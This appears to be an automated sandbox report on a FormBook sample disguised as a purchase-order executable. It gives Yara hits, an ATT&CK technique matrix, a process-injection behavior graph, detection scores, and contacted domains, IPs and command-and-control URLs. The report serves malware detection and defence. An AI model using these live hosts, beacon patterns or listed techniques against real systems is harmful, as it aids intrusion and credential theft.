          Source: Yara matchFile source: 00000004.00000002.279265822.0000000001420000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478037976.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.235177972.0000000004239000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.278875737.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.279183925.00000000012E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO#560.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO#560.zip.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.279265822.0000000001420000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478037976.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.235177972.0000000004239000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.278875737.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.279183925.00000000012E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO#560.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO#560.zip.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading11Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information14DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383967 Sample: PO#560.zip.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.turningtecc.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 10 other signatures 2->45 11 PO#560.zip.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\PO#560.zip.exe.log, ASCII 11->29 dropped 55 Tries to detect virtualization through RDTSC time measurements 11->55 57 Injects a PE file into a foreign processes 11->57 15 PO#560.zip.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.new123movies.pro 185.53.177.14, 49734, 80 TEAMINTERNET-ASDE Germany 18->33 35 dualstack.sni.bigcartel.map.fastly.net 151.101.1.211, 49732, 80 FASTLYUS United States 18->35 37 3 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 systray.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO#560.zip.exe33%VirustotalBrowse
          PO#560.zip.exe42%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.PO#560.zip.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.new123movies.pro0%VirustotalBrowse
          dualstack.sni.bigcartel.map.fastly.net0%VirustotalBrowse
          www.talllensphotography.com5%VirustotalBrowse
          www.turningtecc.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://www.mymoxypets.com/md5?IBcTaR=Djxti6ShQzh8&amp;DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/30%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/hs0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/hs0%Avira URL Cloudsafe
          http://www.mymoxypets.com/md5/?IBcTaR=Djxti6ShQzh8&DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3xA/G+A1ySyYzJdTo7KJPmykLVFLh30%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cnt-i%0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/I0%Avira URL Cloudsafe
          http://www.carterandcone.com20%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.founder.com.cn/cn;0%Avira URL Cloudsafe
          http://www.carterandcone.com30%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.new123movies.pro/md5/?DzrLH=dXMJ/yrosuk4D2OPjKCB839u/6tvM7QWLhghObYdXqbvabebVJQVkG1vpLTC6vFDwMgu&IBcTaR=Djxti6ShQzh80%Avira URL Cloudsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          https://my.bigcartel.com;0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/en-u0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.carterandcone.comC0%URL Reputationsafe
          http://www.carterandcone.comC0%URL Reputationsafe
          http://www.carterandcone.comC0%URL Reputationsafe
          http://www.fontbureau.comasef0%Avira URL Cloudsafe
          http://www.carterandcone.com90%Avira URL Cloudsafe
          http://www.fontbureau.comav0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/n-u0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.carterandcone.comQ0%Avira URL Cloudsafe
          http://www.fontbureau.comrsiv0%URL Reputationsafe
          http://www.fontbureau.comrsiv0%URL Reputationsafe
          http://www.fontbureau.comrsiv0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp//d10%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          www.talllensphotography.com/md5/100%Avira URL Cloudmalware
          http://www.carterandcone.comTC)0%Avira URL Cloudsafe
          http://www.carterandcone.comI0%Avira URL Cloudsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          https://www.mymoxypets.com/md5?IBcTaR=Djxti6ShQzh8&DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3xA/G0%Avira URL Cloudsafe
          http://www.carterandcone.coma0%URL Reputationsafe
          http://www.carterandcone.coma0%URL Reputationsafe
          http://www.carterandcone.coma0%URL Reputationsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/R0%Avira URL Cloudsafe
          http://www.carterandcone.comego0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/I0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/I0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/I0%URL Reputationsafe
          http://www.microsoft.0%URL Reputationsafe
          http://www.microsoft.0%URL Reputationsafe
          http://www.microsoft.0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.zhongyicts.com.cnbio0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.new123movies.pro
          185.53.177.14
          truetrueunknown
          dualstack.sni.bigcartel.map.fastly.net
          151.101.1.211
          truetrueunknown
          www.talllensphotography.com
          50.118.194.26
          truetrueunknown
          www.turningtecc.com
          unknown
          unknowntrueunknown
          www.mymoxypets.com
          unknown
          unknowntrue
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.mymoxypets.com/md5/?IBcTaR=Djxti6ShQzh8&DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3xA/G+A1ySyYzJdTo7KJPmykLVFLh3true
            • Avira URL Cloud: safe
            unknown
            http://www.new123movies.pro/md5/?DzrLH=dXMJ/yrosuk4D2OPjKCB839u/6tvM7QWLhghObYdXqbvabebVJQVkG1vpLTC6vFDwMgu&IBcTaR=Djxti6ShQzh8true
            • Avira URL Cloud: safe
            unknown
            www.talllensphotography.com/md5/true
            • Avira URL Cloud: malware
            low
            http://www.talllensphotography.com/md5/?IBcTaR=Djxti6ShQzh8&DzrLH=JP702FCblU1K1nbBBTKIcgs3vFjx7LTnku6fbfQ3JvhMEqeKMVIpxerk2LYg3Mu/rBkVtrue
            • Avira URL Cloud: malware
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://www.mymoxypets.com/md5?IBcTaR=Djxti6ShQzh8&amp;DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3systray.exe, 0000000A.00000002.485148191.00000000053BF000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.fontbureau.com/designersGPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
              high
              http://www.jiyu-kobo.co.jp/jp/hsPO#560.zip.exe, 00000000.00000003.214608357.000000000608C000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.jiyu-kobo.co.jp/hsPO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.fontbureau.com/designers/?PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                high
                http://www.founder.com.cn/cn/bThePO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://github.com/michel-pi/EasyBot.NetPO#560.zip.exefalse
                  high
                  http://www.fontbureau.com/designers?PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                    high
                    http://www.founder.com.cn/cnt-i%PO#560.zip.exe, 00000000.00000003.212947601.00000000060AE000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.jiyu-kobo.co.jp/jp/IPO#560.zip.exe, 00000000.00000003.214608357.000000000608C000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.carterandcone.com2PO#560.zip.exe, 00000000.00000003.213718774.00000000060B0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.tiro.comexplorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.founder.com.cn/cn;PO#560.zip.exe, 00000000.00000003.212947601.00000000060AE000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                      high
                      http://www.carterandcone.com3PO#560.zip.exe, 00000000.00000003.213964934.00000000060B0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.goodfont.co.krPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.carterandcone.comPO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://my.bigcartel.com;systray.exe, 0000000A.00000002.485148191.00000000053BF000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://www.sajatypeworks.comPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.typography.netDPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.founder.com.cn/cn/cThePO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.galapagosdesign.com/staff/dennis.htmPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/en-uPO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://fontfabrik.comPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.carterandcone.comCPO#560.zip.exe, 00000000.00000003.213718774.00000000060B0000.00000004.00000001.sdmp, PO#560.zip.exe, 00000000.00000003.213964934.00000000060B0000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.comasefPO#560.zip.exe, 00000000.00000002.241188316.000000000608A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.carterandcone.com9PO#560.zip.exe, 00000000.00000003.213824153.00000000060B0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.fontbureau.com/designers_PO#560.zip.exe, 00000000.00000003.215780122.00000000060B0000.00000004.00000001.sdmpfalse
                        high
                        http://www.fontbureau.comavPO#560.zip.exe, 00000000.00000002.241188316.000000000608A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.jiyu-kobo.co.jp/n-uPO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.galapagosdesign.com/DPleasePO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.jiyu-kobo.co.jp/Y0PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.carterandcone.comQPO#560.zip.exe, 00000000.00000003.214819617.00000000060B0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.comrsivPO#560.zip.exe, 00000000.00000002.241188316.000000000608A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fonts.comPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                          high
                          http://www.jiyu-kobo.co.jp//d1PO#560.zip.exe, 00000000.00000003.214335139.0000000006083000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.sandoll.co.krPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.urwpp.deDPleasePO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.zhongyicts.com.cnPO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.carterandcone.comTC)PO#560.zip.exe, 00000000.00000003.213718774.00000000060B0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.carterandcone.comIPO#560.zip.exe, 00000000.00000003.213964934.00000000060B0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.carterandcone.como.PO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.sakkal.comPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://www.mymoxypets.com/md5?IBcTaR=Djxti6ShQzh8&DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3xA/Gsystray.exe, 0000000A.00000002.485148191.00000000053BF000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.carterandcone.comaPO#560.zip.exe, 00000000.00000003.213824153.00000000060B0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0PO#560.zip.exe, 00000000.00000003.213421217.00000000060AF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.comPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                              high
                              http://www.agfamonotype.PO#560.zip.exe, 00000000.00000003.222424567.00000000060B0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.carterandcone.comcPO#560.zip.exe, 00000000.00000003.213824153.00000000060B0000.00000004.00000001.sdmpfalse
                                unknown
                                http://www.carterandcone.comTCPO#560.zip.exe, 00000000.00000003.213824153.00000000060B0000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/RPO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.carterandcone.comegoPO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/IPO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.microsoft.PO#560.zip.exe, 00000000.00000003.213421217.00000000060AF000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/jp/PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.zhongyicts.com.cnbioPO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.carterandcone.comlPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.jiyu-kobo.co.jp/wPO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.founder.com.cn/cnPO#560.zip.exe, 00000000.00000003.212947601.00000000060AE000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.monotype.4PO#560.zip.exe, 00000000.00000003.215261953.00000000060B0000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.fontbureau.com/designers/frere-jones.htmlPO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.monotype.PO#560.zip.exe, 00000000.00000003.215072761.00000000060B0000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.jiyu-kobo.co.jp/PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmp, PO#560.zip.exe, 00000000.00000003.214435274.000000000608A000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers#PO#560.zip.exe, 00000000.00000003.215738986.00000000060B0000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers8PO#560.zip.exe, 00000000.00000003.216534912.00000000060B0000.00000004.00000001.sdmp, PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.carterandcone.comdd_PO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        low
                                        http://www.fontbureau.com/designers:PO#560.zip.exe, 00000000.00000003.216063105.00000000060B0000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/dPO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/PO#560.zip.exe, 00000000.00000003.215703797.00000000060B0000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.carterandcone.comwdthPO#560.zip.exe, 00000000.00000003.213718774.00000000060B0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.carterandcone.comTCmPO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpfalse
